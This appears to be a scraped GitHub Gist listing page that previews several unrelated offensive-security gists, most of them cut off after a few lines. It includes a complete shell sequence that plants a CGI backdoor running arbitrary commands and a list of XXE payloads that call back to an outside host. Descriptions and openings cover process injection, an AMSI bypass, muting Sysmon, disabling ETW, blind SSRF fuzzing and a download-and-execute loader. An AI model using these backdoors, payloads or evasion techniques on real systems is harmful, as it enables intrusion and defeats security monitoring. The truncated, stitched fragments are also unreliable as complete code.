AA-2020743
byt3bl33d3r
/ log4j_rce_check.py
Created
December 10, 2021 06:02
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (https://www.lunasec.io/docs/blog/log4j-zero-day/)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python3 | |
| ''' | |
| Needs Requests (pip3 install requests) | |
| Author: Marcello Salvati, Twitter: @byt3bl33d3r | |
| License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License) | |
| This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021. |
MarkBaggett
/ gist:38dcff6a0975f148aa858e924d64c492
Created
November 14, 2020 18:22
http.server cgi backdoor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cd /tmp | |
| mkdir cgi-bin | |
| echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi | |
| echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi | |
| echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi | |
| chmod +x ./cgi-bin/backdoor.cgi | |
| python -m http.server --cgi | |
jfmaes
/ DInjectQueuerAPC.cs
Created
November 13, 2020 19:00
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace DinjectorWithQUserAPC | |
| { | |
| public class Program |
honoki
/ xxe-payloads.txt
Last active
November 11, 2024 17:01
XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
FatRodzianko
/ my-am-bypass.ps1
Last active
February 7, 2025 22:31
small modification to Rastemouse's AmsiScanBuffer bypass to use bytes. Uses different opcode bytes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Win32 = @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| public class Win32 { | |
| [DllImport("kernel32")] | |
| public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); | |
| [DllImport("kernel32")] |
Flangvik
/ MuteSysmon.cs
Created
July 14, 2020 15:01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Linq; | |
| using System.Text; | |
| namespace MuteSysmon | |
| { | |
| class Program |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # v.0.1 - by SI9INT (https://si9int.sh) | |
| # Chromium and chromedriver required, be sure to check if both version are the same | |
| # `mkdir screens` to get started, script won't create the folder | |
| import queue, threading, sys | |
| from selenium import webdriver | |
| from selenium.webdriver.chrome.options import Options | |
| CHROME_PATH = '/usr/bin/chromium' |
xpn
/ env_var_spoofing_poc.cpp
Created
June 6, 2020 21:25
A very rough x64 POC for spoofing environment variables (similar to argument spoofing) with a focus on setting the COMPlus_ETWEnabled=0 var used to disable ETW in .NET
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on | |
| // setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET. | |
| // | |
| // Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables, | |
| // and then resuming the process. | |
| // | |
| // (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/) | |
| #define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0" | |
| #define INJECT_PARAM_LEN 43 |
hussein98d
/ ssrf.sh
Created
May 7, 2020 02:09
This script takes a domain name and a callback server, parses links , appends SSRF parameters and fire the requests.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d" | |
| echo "Usage: bash script.sh domain.com http://server-callbak" | |
| echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls" | |
| if [ -z "$1" ]; then | |
| echo >&2 "ERROR: Domain not set" | |
| exit 2 | |
| fi | |
| if [ -z "$2" ]; then | |
| echo >&2 "ERROR: Sever link not set" | |
| exit 2 |
mvelazc0
/ GetAndRun.cs
Last active
October 4, 2020 02:44
Downloads a XOR encrypted assembly payload (Payload.cs) and executes the "Run" method using .NET reflection
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.IO; | |
| using System.Linq; | |
| using System.Net; | |
| using System.Reflection; | |
| using System.Text; | |
| namespace GetAndRun | |
| { |
NewerOlder